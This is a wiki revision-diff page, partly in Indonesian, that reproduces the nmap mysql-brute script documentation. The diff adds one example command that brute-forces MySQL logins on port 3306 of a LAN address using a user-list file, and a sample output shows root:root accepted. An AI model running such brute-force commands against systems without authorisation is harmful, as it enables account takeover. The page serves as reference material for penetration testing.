Difference between revisions of "Nmap: brute force hack mysql password"

From OnnoWiki
Jump to navigation Jump to search
Line 16: Line 16:
  
 
  nmap --script=mysql-brute <target>
 
  nmap --script=mysql-brute <target>
 +
Nmap  -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/Desktop/user.txt 192.168.1.105
  
 
==Script Output==
 
==Script Output==

Revision as of 07:39, 1 June 2018

Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html


File mysql-brute

Script types: portrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/mysql-brute.nse

User Summary

Lakukan hack pada password MySQL.


Example Usage

nmap --script=mysql-brute <target>
Nmap  -sT -p3306 –script mysql-brute.nse –script-args userdb=/root/Desktop/user.txt 192.168.1.105

Script Output

3306/tcp open  mysql
| mysql-brute:
|   Accounts
|     root:root - Valid credentials

Referensi